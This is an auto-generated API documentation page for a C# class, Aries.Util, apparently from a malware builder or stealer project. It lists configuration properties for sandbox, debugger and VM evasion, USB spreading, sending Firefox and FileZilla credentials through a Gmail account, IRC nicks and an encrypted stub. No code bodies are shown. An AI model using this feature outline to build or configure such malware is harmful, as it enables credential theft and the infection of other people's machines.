C# Class Aries.Util

Datei anzeigen Open project: EAXrec/Aries

Public Properties

Property Type Description
AESClass SimpleAES
AntiSandbox bool
AntiSniffDebug bool
AntiSysinternals bool
AntiVirtual bool
CrashType int
DisplayErrorMsg bool
DisplayInVirtual bool
EncryptHost bool
ErrorBody string
ErrorTitle string
FSplit string
FSplit2 string
FSplit3 string
FSplit4 string
GmailPass string
GmailUser string
OriginalSize int
PackedSize int
ProtectNum string
SendFirefoxFilezilla bool
USBSpread bool
UseRandomNick bool
compressed bool
encryptionkey byte[]
file1TargetFileOutput string
msgIcon string
stub string

Public Methods

Method Description
IsProcessRunning ( string file_name ) : bool

Check for a process name and window title

Reverse ( string x ) : string

Reverse a string

getRandNum ( int length ) : string

Return a string of random letters (removed numbers for more compatible use)

Private Methods

Method Description
GetModuleHandle ( string lpModuleName ) : IntPtr

Method Details

IsProcessRunning() public static method

Check for a process name and window title
public static IsProcessRunning ( string file_name ) : bool
file_name string Process or window title to check for
return bool

Reverse() public static method

Reverse a string
public static Reverse ( string x ) : string
x string String to reverse
return string

getRandNum() public static method

Return a string of random letters (removed numbers for more compatible use)
public static getRandNum ( int length ) : string
length int Length of random string to return
return string

Property Details

AESClass public_oe static_oe property

public static SimpleAES AESClass
return SimpleAES

AntiSandbox public_oe static_oe property

Anti Sandboxie
public static bool AntiSandbox
return bool

AntiSniffDebug public_oe static_oe property

Anti Sniffers/Debuggers
public static bool AntiSniffDebug
return bool

AntiSysinternals public_oe static_oe property

Anti Sysinternals products
public static bool AntiSysinternals
return bool

AntiVirtual public_oe static_oe property

Anti Virtual Environment
public static bool AntiVirtual
return bool

CrashType public_oe static_oe property

Numeric value for the way that the program will end itself
public static int CrashType
return int

DisplayErrorMsg public_oe static_oe property

Anti Sandboxie
public static bool DisplayErrorMsg
return bool

DisplayInVirtual public_oe static_oe property

Display the error msg if it's enabled and if running in a Virtual Environement
public static bool DisplayInVirtual
return bool

EncryptHost public_oe static_oe property

Encrypt the host file?
public static bool EncryptHost
return bool

ErrorBody public_oe static_oe property

Body of the error msg to display if enabled
public static string ErrorBody
return string

ErrorTitle public_oe static_oe property

Title of the error msg to display if enabled
public static string ErrorTitle
return string

FSplit public_oe static_oe property

public static string FSplit
return string

FSplit2 public_oe static_oe property

public static string FSplit2
return string

FSplit3 public_oe static_oe property

public static string FSplit3
return string

FSplit4 public_oe static_oe property

public static string FSplit4
return string

GmailPass public_oe static_oe property

Gmail Password
public static string GmailPass
return string

GmailUser public_oe static_oe property

Gmail Username
public static string GmailUser
return string

OriginalSize public_oe static_oe property

Original size of the target file
public static int OriginalSize
return int

PackedSize public_oe static_oe property

public static int PackedSize
return int

ProtectNum public_oe static_oe property

public static string ProtectNum
return string

SendFirefoxFilezilla public_oe static_oe property

Send Firefox/Filezilla info after running 1st time
public static bool SendFirefoxFilezilla
return bool

USBSpread public_oe static_oe property

Spread to USB drives after running 1st time
public static bool USBSpread
return bool

UseRandomNick public_oe static_oe property

use a random irc nick
public static bool UseRandomNick
return bool

compressed public_oe static_oe property

Compress the target file?
public static bool compressed
return bool

encryptionkey public_oe static_oe property

Encryption key used for AES
public static byte[] encryptionkey
return byte[]

file1TargetFileOutput public_oe static_oe property

The target file contents, stored in a string
public static string file1TargetFileOutput
return string

msgIcon public_oe static_oe property

public static string msgIcon
return string

stub public_oe static_oe property

string to store the stub in
public static string stub
return string